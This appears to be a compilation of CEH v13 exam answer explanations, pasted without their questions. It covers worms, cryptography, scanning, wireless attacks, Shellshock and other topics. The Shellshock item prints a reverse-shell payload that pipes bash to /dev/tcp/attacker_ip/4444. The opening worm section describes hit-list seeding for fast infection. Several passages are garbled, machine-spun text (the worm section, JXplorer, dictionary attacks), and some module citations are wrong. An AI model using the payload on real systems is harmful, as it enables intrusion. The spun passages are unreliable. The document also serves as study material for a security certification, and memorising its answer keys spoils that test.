E. B757BF5C0D87772FAAD3B435B51404EE ← also ends with AAD3B435B51404EE → < 8 chars

From CEH v13 Official Courseware:

Module 6: Malware Threats → LM Hash Weaknesses

One of the biggest problems a worm faces in achieving a very fast rate of infection is “getting off the ground.” although a worm spreads exponentially throughout the early stages of infection, the time needed to infect say the first 10,000 hosts dominates the infection time.

There is a straightforward way for an active worm a simple this obstacle, that we term hit-list scanning. Before the worm is free, the worm author collects a listing of say ten,000 to 50,000 potentially vulnerable machines, ideally ones with sensible network connections. The worm, when released onto an initial machine on this hit-list, begins scanning down the list. once it infects a machine, it divides the hit-list in half, communicating half to the recipient worm, keeping the other half.

This fast division ensures that even if only 10-20% of the machines on the hit-list are actually vulnerable, an active worm can quickly bear the hit-list and establish itself on all vulnerable machines in only some seconds. though the hit-list could begin at 200 kilobytes, it quickly shrinks to nothing during the partitioning. This provides a great benefit in constructing a quick worm by speeding the initial infection.

The hit-list needn’t be perfect: a simple list of machines running a selected server sort could serve, though larger accuracy can improve the unfold. The hit-list itself is generated victimization one or many of the following techniques, ready well before, typically with very little concern of detection.

Stealthy scans. Portscans are so common and then wide ignored that even a quick scan of the whole net would be unlikely to attract law enforcement attention or over gentle comment within the incident response community. However, for attackers wish to be particularly careful, a randomised sneaky scan taking many months would be not possible to attract much attention, as most intrusion detection systems are not currently capable of detecting such low-profile scans. Some portion of the scan would be out of date by the time it had been used, however abundant of it’d not.

Distributed scanning. an assailant might scan the web using a few dozen to some thousand already-compromised “zombies,” the same as what DDOS attackers assemble in a very fairly routine fashion. Such distributed scanning has already been seen within the wild–Lawrence Berkeley National Laboratory received ten throughout the past year.

DNS searches. Assemble a list of domains (for example, by using wide offered spam mail lists, or trolling the address registries). The DNS will then be searched for the science addresses of mail-servers (via mx records) or net servers (by looking for www.domain.com).

Spiders. For net server worms (like Code Red), use Web-crawling techniques the same as search engines so as to produce a list of most Internet-connected web sites. this would be unlikely to draw in serious attention.

Public surveys. for many potential targets there may be surveys available listing them, like the Netcraft survey.

Just listen. Some applications, like peer-to-peer networks, wind up advertising many of their servers. Similarly, many previous worms effectively broadcast that the infected machine is vulnerable to further attack. easy, because of its widespread scanning, during the Code Red I infection it was easy to select up the addresses of upwards of 300,000 vulnerable IIS servers–because each came knock on everyone’s door!

The protocol that you would recommend to the team to achieve the secure exchange of the symmetric key is the Diffie-Hellman protocol. The Diffie-Hellman protocol is a key agreement protocol that allows two or more parties to establish a shared secret key over an unsecured communication channel, without having to exchange the key itself. The Diffie-Hellman protocol works as follows12:

The parties agree on a large prime number p and a generator g, which are public parameters that can be known by anyone.

Each party chooses a random private number a or b, which are kept secret from anyone else.

Each party computes a public value A or B, by raising g to the power of a or b modulo p, i.e., A = g^a mod p and B = g^b mod p.

Each party sends their public value A or B to the other party over the unsecured channel.

Each party computes the shared secret key K, by raising the received public value to the power of their own private number modulo p, i.e., K = A^b mod p = B^a mod p.

The parties can now use the shared secret key K to encrypt and decrypt the data using a symmetric key encryption algorithm, such as AES or 3DES.

The Diffie-Hellman protocol can ensure the secure exchange of the symmetric key because it relies on the mathematical difficulty of computing discrete logarithms, which means that it is hard to find the private numbers a or b given the public values A or B, g, and p. Therefore, an attacker who intercepts the public values A or B cannot easily compute the shared secret key K, and thus cannot decrypt the data encrypted with K12.

The other options are not as appropriate as option B for the following reasons:

A. Implementing SSL certificates on your company’s web servers: This option is not relevant because SSL certificates are not used to exchange symmetric keys, but to authenticate the identity of the web servers and to establish a secure connection using public key encryption. SSL certificates are digital certificates that contain the public key and the identity information of the web server, and are issued and signed by a trusted certificate authority (CA). When a client connects to a web server, the web server sends its SSL certificate to the client, who verifies it with the CA. If the verification is successful, the client and the web server use the public key in the certificate to exchange a symmetric key, which is then used to encrypt and decrypt the data. However, this option does not address the scenario of transmitting data over an unsecured communication channel, which may not involve web servers or SSL certificates34.

C. Switching all data transmission to the HTTPS protocol: This option is not sufficient because HTTPS protocol is not a protocol for exchanging symmetric keys, but a protocol for securing web traffic using SSL or TLS encryption. HTTPS protocol is a combination of HTTP protocol and SSL or TLS protocol, which means that it uses HTTP for the application layer communication and SSL or TLS for the transport layer encryption. When a client requests a web page from a web server using HTTPS protocol, the client and the web server establish a secure connection using SSL or TLS protocol, which involves the exchange of SSL certificates and a symmetric key, as explained in option A. Then, the client and the web server use the symmetric key to encrypt and decrypt the HTTP data. However, this option does not address the scenario of transmitting data over an unsecured communication channel, which may not involve web servers or HTTPS protocol5 .

D. Utilizing SSH for secure remote logins to the servers: This option is not applicable because SSH is not a protocol for exchanging symmetric keys, but a protocol for securing remote access to servers using public key authentication and encryption. SSH is a protocol that allows a client to securely connect to a server and execute commands or transfer files over an encrypted channel. SSH uses public key cryptography to authenticate the identity of the server and the client, and to exchange a symmetric key, which is then used to encrypt and decrypt the data. However, this option does not address the scenario of transmitting data over an unsecured communication channel, which may not involve remote logins or SSH protocol .

tcptrace is a command-line tool used to analyze the output of packet-capture tools such as tcpdump and Wireshark. It processes the captured data and generates detailed reports on TCP connections including connection durations, round-trip times, throughput, and more.

???? Reference – CEH v13 Study Guide, Module 10: Sniffing

“tcptrace reads in packet trace files and outputs information about each TCP connection seen.”

❌ Incorrect options:

B. Nessus is a vulnerability scanner.

C. OpenVAS is also a vulnerability assessment tool.

D. tcptraceroute is used to trace the path of packets at the TCP level, not for analyzing captured data.

In CEH v13 Module 11: Hacking Wireless Networks, WPS (Wi-Fi Protected Setup) is discussed as a vulnerable configuration that can be exploited using tools like Reaver and wash.

wash is a command-line utility used to detect WPS-enabled Access Points.

It provides information about:

Whether WPS is enabled or locked.

Signal strength, BSSID, channel, etc.

Very useful before attempting WPS PIN attacks.

Option Clarifications:

B. ntptrace: Used for querying NTP servers, not wireless networks.

C. macof: Part of dsniff suite; floods network with MAC addresses (DoS tool).

D. net view: Windows command for listing network shares, not for wireless or WPS.

Correct answer is A. wash.

ARP (Address Resolution Protocol) spoofing/poisoning is a common attack in which an attacker sends falsified ARP messages to associate their MAC address with the IP address of another host. To defend against ARP spoofing:

A. Port Security: Limits the number of MAC addresses per port; prevents MAC flooding and spoofing.

B. ARPwatch: Monitors ARP traffic and alerts on unusual changes.

D. Static ARP Entries: Prevent ARP responses from overwriting MAC-IP mappings, effective in small networks.

From CEH v13 Official Courseware:

Module 8: Sniffing

Module 11: Session Hijacking

Module 20: Network Security

Incorrect Options:

C: Firewalls operate at Layer 3+; ARP is a Layer 2 protocol, so firewalls don’t prevent ARP spoofing.

E: Static IP addresses do not prevent ARP poisoning.

CEH v13 details that fragmentation attacks are a common IDS evasion strategy. Signature-based IDS systems depend on reassembling packets to detect malicious patterns. When attackers fragment TCP headers into smaller segments, the IDS may be unable to reconstruct the original packet sequence, especially if the fragments are intentionally crafted to confuse reassembly buffers. Meanwhile, the target host typically recombines the fragments correctly, allowing the scan or payload to pass undetected. This technique is specifically discussed under IDS evasion methods, where fragmentation prevents complete packet inspection. Options A and B describe unrelated evasion mechanisms such as IP spoofing and MAC spoofing, and Option C does not fundamentally affect IDS reconstruction. The tester is clearly using packet fragmentation to evade detection while still mapping open ports successfully.

The scenario describes an injection attack involving Server Side Includes (SSI). SSI directives are instructions placed in web pages that are executed by the web server before the page is sent to the user. If user input is improperly validated and directly used in an SSI-enabled environment, attackers can inject malicious SSI directives (such as file manipulation commands).

From CEH v13 Official Courseware:

Server-Side Includes (SSI) Injection occurs when attackers submit specially crafted input that is included in server responses and interpreted as SSI directives.

These directives can perform dangerous actions like:

Reading sensitive files (e.g., /etc/passwd)

Deleting or modifying files

Running shell commands via #exec directive

Incorrect options:

A. Server-side template injection is related to template engines like Jinja2 or Twig.

B. Server-side JS injection applies to environments like Node.js.

C. CRLF injection manipulates HTTP headers, not SSI parsing.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “Injection Flaws”

Subsection: “SSI Injection”

Lab Reference: CEH iLabs – Web Application Exploitation

===========

In a professional penetration test or vulnerability assessment, the most efficient and effective way to discover vulnerabilities on a Windows-based system is to use an automated vulnerability scanning tool such as Nessus.

Nessus is a widely used vulnerability scanner developed by Tenable. It performs comprehensive scans across systems to identify:

Missing patches and updates

Misconfigurations

Weak or default credentials

Known vulnerabilities and associated CVEs

Outdated software versions

CEH v13 course material emphasizes the use of tools like Nessus, OpenVAS, and Qualys during the Vulnerability Analysis phase of ethical hacking engagements.

From CEH v13 Official Study Guide (Module 05: Vulnerability Analysis):

“Vulnerability scanning tools such as Nessus and OpenVAS are used to automatically identify known vulnerabilities in systems, including operating systems, applications, and services. These tools correlate identified issues with CVE entries and offer severity ratings based on CVSS scores.”

Incorrect Options Explained:

A. The Windows Update tool only updates the operating system and Microsoft applications. It is not designed to detect security flaws or vulnerabilities comprehensively.

C. MITRE.org is an excellent source of information for known vulnerabilities (CVEs), but it does not scan systems or detect vulnerabilities in a target environment.

D. Creating a disk image is useful for forensic purposes or backup, but it does not help in actively identifying vulnerabilities in a live system.

Reference – CEH v13 Study Guide:

Module 05: Vulnerability Analysis

Section: “Vulnerability Assessment Tools”

CEH iLabs Exercise: “Using Nessus to Perform Vulnerability Scanning”

CEH v13 explains that Windows systems running older or default configurations often allow anonymous or null session connections to IPC$ shares, enabling attackers to enumerate users, groups, shares, and other system details without authentication. Null session enumeration is highlighted as a classic yet effective technique because it generates minimal detectable activity and does not require credentials, making it ideal for stealth operations. CEH stresses that SMB null sessions are frequently overlooked in legacy or poorly hardened environments, especially when default permissions remain unchanged. Packet sniffing (Option A) may provide some data but requires traffic visibility and may be detected through monitoring tools. DNS zone transfers (Option B) require misconfigurations and usually do not reveal user list details. SNMP queries (Option D) require community strings and often generate alerts. Therefore, exploiting null sessions is the most covert and effective method for enumerating Windows systems under default configurations.

CEH v13 highlights the Idle Scan as one of the stealthiest reconnaissance methods available, designed specifically to avoid detection by IDS and security monitoring tools. Idle scanning leverages a “zombie host”—a system with a predictable IPID sequence—to route all probe packets through it. Since no packets ever originate directly from the attacker’s IP, IDS systems are unable to attribute the port scan to the attacker. CEH emphasizes that this technique creates zero direct traffic between the attacker and the target, making it extremely evasive and ideal for highly monitored networks. FIN scans (Option A) are somewhat stealthy but still originate from the attacker and are detectable. TCP Connect scans (Option C) are the most detectable because they complete full connections. ICMP Echo scans (Option D) are easily logged and flagged by IDS. Idle scanning is uniquely suited for bypassing advanced detection systems while still identifying open ports and live hosts.

When standard protections such as HTTPS, HTTP-only flags, and session regeneration are properly implemented, CEH teaches that predictable session identifiers become one of the few remaining avenues for session hijacking. Session token prediction involves analyzing entropy, randomness, or generation patterns within session IDs to mathematically infer future or valid tokens. If the application uses weak randomization algorithms, insufficient entropy sources, or predictable sequences, attackers may generate a valid session ID without direct interception. Techniques such as MitM interception or CSRF manipulation do not bypass strong transport-layer protections and cookie restrictions. Session fixation fails because the application regenerates the session ID upon login, invalidating pre-set identifiers. Therefore, the advanced and CEH-aligned method to hijack a protected session is predicting session IDs through side-channel or pattern analysis.

TCP port 21 is used by the File Transfer Protocol (FTP), which is an unencrypted protocol. To detect if unencrypted file transfers are taking place, you can apply the Wireshark display filter:

tcp.port == 21

This will show all traffic to and from FTP servers. Since FTP transmits usernames, passwords, and data in clear text, its use would violate the company’s policy.

CEH v13 states:

“FTP (Port 21) is a cleartext protocol vulnerable to sniffing. To enforce secure communication, companies often transition to SFTP (over SSH, port 22) or FTPS (FTP over TLS/SSL).”

Incorrect Options:

B. Port 23 is used for Telnet, not FTP.

C. Combining FTP (21) and SSH/SFTP (22) would include encrypted traffic, which is not what you're trying to isolate.

D. tcp.port != 21 filters out FTP traffic, which is the opposite of the intended goal.

Reference – CEH v13 Guide:

Module 01: Introduction to Ethical Hacking

Subsection: Sniffing and Cleartext Protocols

Wireshark iLab: Identifying FTP Traffic

===========

https://en.wikipedia.org/wiki/Presentation_layer

In the seven-layer OSI model of computer networking, the presentation layer is layer 6 and serves as the data translator for the network. It is sometimes called the syntax layer. The presentation layer is responsible for the formatting and delivery of information to the application layer for further processing or display.

Encryption is typically done at this level too, although it can be done on the application, session, transport, or network layers, each having its own advantages and disadvantages. Decryption is also handled at the presentation layer. For example, when logging on to bank account sites the presentation layer will decrypt the data as it is received.

The command usage that would best serve your objective to find where the NTP server obtains the time from and to trace the list of NTP servers connected to the network is ntptrace -n -m 5 192.168.1.1. This command usage works as follows:

ntptrace is a tool that determines where a given NTP server gets its time from, and follows the chain of NTP servers back to their master time source. For example, a stratum 0 server, which is a device that directly obtains the time from a physical source, such as an atomic clock or a GPS receiver1.

-n is a flag that outputs host IP addresses instead of host names. This can be useful if the host names are not resolvable or if the IP addresses are more informative1.

-m 5 is a flag that specifies the maximum number of hosts to be traced. This can be useful to limit the output and avoid tracing irrelevant or unreachable hosts1.

192.168.1.1 is the IP address of the NTP server in the demilitarized zone, which is the starting point of the trace. This can be useful to find out the source and the path of the time synchronization for the network system1.

By using this command usage, the output will show the IP addresses, the stratum, the offset, the sync distance, and the reference ID of each NTP server in the chain, up to five hosts. This can provide valuable information about the accuracy, the reliability, and the security of the time service for the network system1.

The other options are not as suitable as option D for the following reasons:

A. ntptrace -m 5 192.168.1.1: This option is similar to option D, but it does not use the -n flag, which means that it will output host names instead of IP addresses. This can be less useful if the host names are not resolvable or if the IP addresses are more informative1.

B. tptrace 192.1681.: This option is incorrect because it uses a wrong tool name and a wrong IP address. tptrace is not a valid tool name, and 192.1681. is not a valid IP address. The correct tool name is ntptrace, and the correct IP address is 192.168.1.11.

C. ntptrace -n localhost: This option is not effective because it uses localhost as the starting point of the trace, which means that it will only show the local host’s time source. This can be useful to check the local host’s time configuration, but it does not help to find out the time source and the trace of the NTP server in the demilitarized zone, which is the objective of this scenario1.

CEH v13 highlights that multi-vector DDoS attacks require multi-layer DDoS mitigation services, often cloud-based, capable of analyzing, filtering, and scrubbing traffic across network, transport, and application layers. These providers maintain massive bandwidth capacity, global scrubbing centers, and behavioral analysis engines that distinguish legitimate sessions from malicious floods. SYN floods and HTTP GET floods require different mitigation techniques simultaneously, which typical firewalls or WAFs cannot handle without dropping legitimate traffic. Blocking SYN packets (Option A) would disrupt normal users. A WAF (Option C) handles only Layer 7 traffic and does not mitigate network-layer volumetric attacks. Increasing bandwidth (Option D) is ineffective against large botnet attacks. Therefore, deploying a multi-layer cloud DDoS protection service is the most effective solution for resilient, real-time mitigation.

In CEH v13 Module 11: Hacking Wireless Networks, it is explained that disabling SSID broadcast only hides the SSID from casual scanning, not from determined attackers.

When a legitimate client connects to a hidden SSID, the SSID is included in the probe request and association packets, which can be easily sniffed using tools like Wireshark or Kismet.

Leaving authentication open adds no real protection.

Attackers can still capture traffic and use it to determine the SSID and connect to the access point.

https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol

LDAP, the Lightweight Directory Access Protocol, is a mature, flexible, and well supported standards-based mechanism for interacting with directory servers. It’s often used for authentication and storing information about users, groups, and applications, but an LDAP directory server is a fairly general-purpose data store and can be used in a wide variety of applications.

The LDAP protocol can deal in quite a bit of sensitive data: Active Directory usernames, login attempts, failed-login notifications, and more. If attackers get ahold of that data in flight, they might be able to compromise data like legitimate AD credentials and use it to poke around your network in search of valuable assets.

Encrypting LDAP traffic in flight across the network can help prevent credential theft and other malicious activity, but it's not a failsafe—and if traffic is encrypted, your own team might miss the signs of an attempted attack in progress.

While LDAP encryption isn't standard, there is a nonstandard version of LDAP called Secure LDAP, also known as "LDAPS" or "LDAP over SSL" (SSL, or Secure Socket Layer, being the now-deprecated ancestor of Transport Layer Security).

LDAPS uses its own distinct network port to connect clients and servers. The default port for LDAP is port 389, but LDAPS uses port 636 and establishes TLS/SSL upon connecting with a client.

In an inference-based assessment, scanning starts by building an inventory of the protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services, such as an email server, web server, or database server. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.

The scenario describes a decentralized cryptographic trust model where each user maintains a ring or database of public keys, and communications are encrypted using the recipient’s public key. This aligns precisely with the Web of Trust (WOT) model.

According to the CEH v13 Official Courseware:

Web of Trust (WOT) is a decentralized trust model used primarily in PGP (Pretty Good Privacy) environments.

In WOT:

Each user maintains a local keyring of trusted public keys.

There is no central Certificate Authority (CA).

Trust is built based on mutual verification and endorsement of public keys among users.

It uses asymmetric cryptography: messages are encrypted using the receiver's public key and decrypted using the corresponding private key.

This model provides authentication (via digital signatures) and message integrity (via cryptographic hash functions).

Incorrect Options:

A. Zero Trust Network is a security architecture that enforces strict access control but is not a cryptographic trust model.

B. TLS (Transport Layer Security) is a protocol for securing data in transit, commonly used in HTTPS, and relies on the PKI trust model (not WOT).

C. SSL (Secure Socket Layer) is an outdated version of TLS, also based on centralized certificate authorities.

Reference – CEH v13 Official Courseware:

Module 20: Cryptography

Section: “Public Key Infrastructure (PKI) and Trust Models”

Subsection: “Web of Trust (WOT) Model”

Study Guide Table: Comparison of Trust Models – PKI vs WOT vs Hybrid

Lab references in CEH Engage may also cover key signing and verifying concepts in decentralized environments.

DNS spoofing (also known as DNS cache poisoning) occurs when an attacker intercepts or falsifies DNS responses to redirect traffic or exfiltrate data. The appropriate way to prevent such attacks includes:

Implementing DNS anti-spoofing techniques

Using DNSSEC (DNS Security Extensions)

Ensuring proper DNS configurations and validation of responses

From CEH v13:

Module 3: Scanning Networks

Topic: DNS Poisoning and Spoofing Attacks

Defensive Measures: DNS Hardening

CEH v13 Study Guide states:

“To prevent DNS spoofing and cache poisoning, organizations should use DNSSEC, configure anti-spoofing protections, and restrict zone transfers. DNS Anti-spoofing solutions validate responses and ensure data integrity.”

Incorrect Options:

A: Logging may detect but not prevent.

B: Disabling DNS timeouts is unrelated and harmful.

D: Prevents zone transfers, not spoofing specifically.

IoT devices often suffer from weak or missing encryption protocols, creating opportunities for attackers to intercept sensitive information. CEH courseware highlights that when device-to-app communication occurs in plaintext, a man-in-the-middle attack becomes one of the most effective exploitation methods. By positioning themselves between the device and the mobile application, the attacker can observe all transmitted data, including configuration updates, authentication tokens, and personal information. Tools such as Wireshark, mitmproxy, and specialized IoT interception frameworks allow testers to capture packets, decode protocols, and reconstruct application logic. The CEH curriculum stresses the importance of evaluating IoT device communication channels, because many rely on unsecured HTTP or proprietary plaintext protocols. Brute-force attempts, SQL injection, or dictionary attacks do not directly target the device–app communication pathway and would not exploit the fundamental weakness present here: lack of encryption. A MitM attack directly takes advantage of this flaw and provides comprehensive visibility into all transmitted data, making it the most effective and CEH-aligned method of exploitation.

Sending an email to a known non-existent user is a reconnaissance technique used to:

Analyze bounce-back (NDR) messages.

Discover the email server’s operating system, filtering behavior, internal mail routing, and directory structure.

Reveal technologies such as Exchange, Postfix, etc.

From CEH v13 Official Courseware:

Module 2: Footprinting and Reconnaissance

CEH v13 Study Guide states:

“Sending a message to an invalid address can reveal error messages or NDRs that leak internal system details, such as mail server versions, spam filtering technologies, and internal naming conventions.”

Incorrect Options:

A: Not applicable.

B/C: Not the purpose here.

E: Anti-virus testing requires a separate controlled method.

A hybrid attack combines the benefits of both dictionary and brute-force attacks. It takes words from a dictionary and applies modifications such as:

Appending or prepending numbers or symbols

Changing case (e.g., admin → Admin1!)

Leetspeak substitutions (e.g., p@ssw0rd)

From CEH v13 Official Courseware:

Module 6: Malware Threats

Topic: Password Cracking Methods

CEH v13 Study Guide states:

“A hybrid attack is a combination of dictionary and brute-force techniques. It takes dictionary words and mutates them to cover common variations, making it more effective than pure dictionary attacks.”

Incorrect Options:

A/B/D: These are not standard terminology in cryptographic or password auditing literature.

CEH v13 defines a Trojan as malware that appears as a legitimate, trusted software application while secretly executing malicious actions behind the scenes. Trojans rely on deception rather than replication, often masquerading as tools, utilities, updates, or installers. Once executed, they may install backdoors, steal credentials, exfiltrate data, or modify system settings. The defining characteristic emphasized in CEH is the legitimate-looking façade combined with hidden malicious intent, which matches the scenario perfectly. Spyware (Option B) focuses on monitoring and data collection but does not necessarily disguise itself as legitimate software. Worms (Option C) self-replicate across networks, which is not described here. Rootkits (Option D) hide system compromise but do not necessarily pose as legitimate software. Therefore, the malware described is a Trojan.

In CEH v13 Module 11: Hacking Wireless Networks, Kismet is introduced as a passive wireless sniffer and network detector used primarily on Linux systems.

Kismet passively listens for wireless beacons and data frames.

Can detect hidden SSIDs, rogue APs, and even wireless client behaviors.

Does not transmit any packets, making it stealthy and ideal for wireless reconnaissance.

Option Analysis:

A. Burp Suite: Used for web application testing, not wireless.

B. OpenVAS: Vulnerability scanner, not a packet sniffer.

C. tshark: CLI version of Wireshark, can analyze wired and wireless packets, but not wireless-specific or passive by default.

D. Kismet: Correct wireless packet analyzer for Linux.

CEH training outlines the standard methodology for attacking WPA2-PSK networks: capture the 4-way handshake and then attempt offline cracking of the pre-shared key. The most reliable way to force handshake generation is to perform a de-authentication attack using tools like Aireplay-ng. This attack momentarily disconnects a wireless client, forcing it to reauthenticate with the access point. During this reauthentication, the AP and client exchange the 4-way handshake packets necessary for offline cracking. CEH emphasizes that WPA2 encryption itself cannot be brute-forced directly; attackers must obtain the handshake and then apply dictionary or brute-force attacks offline. Attempting XSS or router spoofing does not capture the handshake and is unrelated to WPA2 key extraction. The deauth attack is also a classic wireless attack vector described extensively in CEH because it is effective, does not require interaction with the encryption algorithm, and works regardless of the strength of the AP’s passphrase. Once the handshake is captured, tools such as Hashcat are used to attempt key recovery.

Comprehensive and Detailed Explanation From CEH v13 Guide:

R-U-Dead-Yet? (RUDY) is a DoS tool that targets web applications by sending slow HTTP POST requests with large Content-Length headers. This consumes server resources, leading to a denial of service.

CEH v13 Reference:

Module 9: Denial-of-Service – DoS Tools

“R-U-Dead-Yet? (RUDY) sends long-form POST requests to consume server-side sessions and exhaust resources without completing the transaction.”

https://nmap.org/book/man-port-specification.html

NOTE: In my opinion, this is an absolutely wrong statement of the question. But you may come across a question with a similar wording on the exam. What does "fast" mean? If we want to increase the speed and intensity of the scan we can select the mode using the -T flag (0/1/2/3/4/5). At high -T values, we will sacrifice stealth and gain speed, but we will not limit functionality.

«nmap -T4 -F 10.10.0.0/24» This option is "correct" because of the -F flag.

-F (Fast (limited port) scan)

Specifies that you wish to scan fewer ports than the default. Normally Nmap scans the most common 1,000 ports for each scanned protocol. With -F, this is reduced to 100.

Technically, scanning will be faster, but just because we have reduced the number of ports by 10 times, we are just doing 10 times less work, not faster.

A brute force attack is a method of trying different combinations of passwords or keys to gain access to a system or service. It is not a reliable way of detecting a honeypot, as it may trigger an alert or response from the target. Moreover, a brute force attack does not provide any information about the system’s characteristics or behavior that could indicate a honeypot. A honeypot is a decoy system that is designed to attract and trap attackers, while providing security teams with valuable intelligence and insights. Therefore, an ethical hacker needs to use more subtle and stealthy techniques to detect and avoid honeypots.

The other options are valid techniques for detecting a honeypot. Probing system services and observing the three-way handshake can reveal anomalies or inconsistencies in the system’s responses, such as abnormal banners, ports, or protocols. Using honeypot detection tools like Send-Safe Honeypot Hunter can scan the target network and identify potential honeypots based on various criteria, such as IP address, domain name, or open ports. Analyzing the MAC address can detect instances running on VMware, which is a common platform for deploying honeypots. A honeypot running on VMware will have a MAC address that starts with 00:0C:29, 00:50:56, or 00:05:69. References:

What is a Honeypot? Types, Benefits, Risks and Best Practices

Using Honeypots for Network Intrusion Detection

Detecting Honeypot Access With Varonis

In CEH v13 Module 06: Malware Threats, the Shellshock vulnerability (CVE-2014-6271) is described as a severe bug in the Bash shell where specially crafted environment variables could be used to execute arbitrary commands.

The most common attack vector: Web servers using CGI scripts written in Bash.

Attackers send malicious HTTP requests to CGI endpoints where Bash executes commands.

Exploitation looks like:

User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Password cracking is a core component of the system hacking phase. CEH materials highlight that once password hashes are obtained, attackers often perform offline cracking to avoid detection and bypass account lockout policies. Tools like Hashcat make use of hardware acceleration—specifically, GPU or multi-core CPU computing—to significantly increase cracking throughput. Hardware acceleration allows the system to perform thousands to millions of hash calculations simultaneously, dramatically improving cracking efficiency compared to traditional CPU-bound methods. While dumping SAM contents is part of credential extraction, it is not the optimization described in the scenario. Dictionary rules influence cracking strategy but not raw speed. NetBIOS spoofing is unrelated to password cracking. The emphasis here is on maximizing computational power to accelerate the hash-cracking process, aligning directly with CEH’s explanation of hardware-accelerated offline cracking techniques.

The CEH v13 courseware states that insecure communication occurs when mobile applications transmit sensitive data over unencrypted or weakly encrypted channels, exposing information to interception. When an application uses plain HTTP or does not properly validate certificates, attackers can place themselves between the client and server using a man-in-the-middle (MitM) attack. This allows them to read session tokens, credentials, API keys, or personal user data as it travels across the network. CEH materials emphasize that MitM attacks are the primary exploitation technique for insecure data transmission because they exploit weaknesses in transport-layer security rather than weaknesses in backend code or authentication mechanisms. SQL injection and CSRF attacks target web application logic, not transport encryption. Brute-force attacks target authentication mechanisms and are unrelated to how data is transmitted. Therefore, the most effective exploitation method is intercepting traffic via MitM to capture or manipulate unencrypted communications.

The Snort rule in the image is detecting suspicious bind attempts over DCERPC (Distributed Computing Environment/Remote Procedure Call), specifically targeting ports 135 (RPC) and 445 (SMB) with crafted content. The rule references CVE CAN-2003-0352.

CVE-2003-0352 is associated with the DCOM RPC vulnerability in Microsoft Windows that was exploited by the MS Blaster (also known as Lovsan) worm in 2003.

Key Indicators from the Snort Rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 135

content includes DCERPC binding pattern (|05| and |0b| with specific binary patterns)

Reference to CVE-2003-0352

Class type: attempted-admin

The MS Blaster worm exploited this vulnerability by sending a specially crafted RPC request to port 135, allowing remote code execution.

From CEH v13 Courseware:

Module 6: Malware Threats

Module 11: Session Hijacking

Discussion of historic worms and their exploit signatures, including MS Blaster.

Incorrect Options:

A. WebDav: Typically uses HTTP/HTTPS and was exploited by Nimda.

B. SQL Slammer: Targeted UDP port 1434 (SQL Server), not TCP 135/445.

D. MyDoom: Spread via email and exploited Windows file-sharing mechanisms (port 3127), not DCERPC.

https://en.wikipedia.org/wiki/Phishing

Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers. It occurs when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message. The recipient is then tricked into clicking a malicious link, which can lead to the installation of malware, the freezing of the system as part of a ransomware attack, or the revealing of sensitive information.

An attack can have devastating results. For individuals, this includes unauthorized purchases, the stealing of funds, or identify theft.

Moreover, phishing is often used to gain a foothold in corporate or governmental networks as a part of a larger attack, such as an advanced persistent threat (APT) event. In this latter scenario, employees are compromised in order to bypass security perimeters, distribute malware inside a closed environment, or gain privileged access to secured data.

An organization succumbing to such an attack typically sustains severe financial losses in addition to declining market share, reputation, and consumer trust. Depending on the scope, a phishing attempt might escalate into a security incident from which a business will have a difficult time recovering.

CEH v13 defines a white hat hacker as a security professional who performs authorized assessments to identify vulnerabilities and strengthen an organization’s defenses. The defining characteristic of white hat activity is the presence of formal permission—typically through a signed rules-of-engagement, scope of work, and explicit authorization from the organization. CEH emphasizes that white hats adhere to legal boundaries, follow ethical guidelines, and document findings to support remediation. They may use the same tools and methodologies as malicious hackers, but the intent and authorization distinguish them. In contrast, black hats operate without permission and with malicious intent. Grey hats act without authorization but may not have malicious motivations, making them inappropriate in a formal penetration testing engagement. Script kiddies lack professional skill and rely on pre-made tools without understanding the underlying techniques. Therefore, the hacker described is a white hat—an ethical professional performing sanctioned testing.

JXplorer could be a cross platform LDAP browser and editor. it’s a standards compliant general purpose LDAP client which will be used to search, scan and edit any commonplace LDAP directory, or any directory service with an LDAP or DSML interface.

It is extremely flexible and can be extended and custom in a very number of the way. JXplorer is written in java, and also the source code and source code build system ar obtainable via svn or as a packaged build for users who wish to experiment or any develop the program.

JX is is available in 2 versions; the free open source version under an OSI Apache two style licence, or within the JXWorkBench Enterprise bundle with inbuilt reporting, administrative and security tools.

JX has been through a number of different versions since its creation in 1999; the foremost recent stable release is version 3.3.1, the August 2013 release.

JXplorer could be a absolutely useful LDAP consumer with advanced security integration and support for the harder and obscure elements of the LDAP protocol. it’s been tested on Windows, Solaris, linux and OSX, packages are obtainable for HPUX, AIX, BSD and it should run on any java supporting OS.

Social engineering is a non-technical attack that manipulates human behavior to gain access to systems or data. It often involves deception (e.g., phishing, pretexting, baiting) and requires no technical expertise or tools, making it a low-tech yet highly effective method.

Reference – CEH v13 Official Study Guide:

Module 9: Social Engineering

Quote:

“Social engineering exploits human psychology and trust to gain unauthorized access. It is considered a low-tech method because it does not require technical means.”

Incorrect Options Explained:

B. Eavesdropping may require technical tools to intercept data.

C. Scanning involves active use of tools to find vulnerabilities.

D. Sniffing is technical and requires tools to capture network traffic.

Comprehensive and Detailed Explanation:

A rubber-hose attack refers to extracting cryptographic secrets by means of physical coercion, threats, or torture, rather than technical attacks on the algorithm or implementation.

From CEH v13 Official Study Guide:

Module 10: Cryptography → Types of Attacks

“A rubber-hose attack bypasses technical security by attacking the human element.”

A dictionary Attack as an attack vector utilized by the attacker to break in a very system, that is password protected, by golf shot technically each word in a very dictionary as a variety of password for that system. This attack vector could be a variety of Brute Force Attack.

The lexicon will contain words from an English dictionary and conjointly some leaked list of commonly used passwords and once combined with common character substitution with numbers, will generally be terribly effective and quick.

How is it done?

Basically, it’s attempting each single word that’s already ready. it’s done victimization machine-controlled tools that strive all the possible words within the dictionary.

Some password Cracking Software:

• John the ripper

• L0phtCrack

• Aircrack-ng

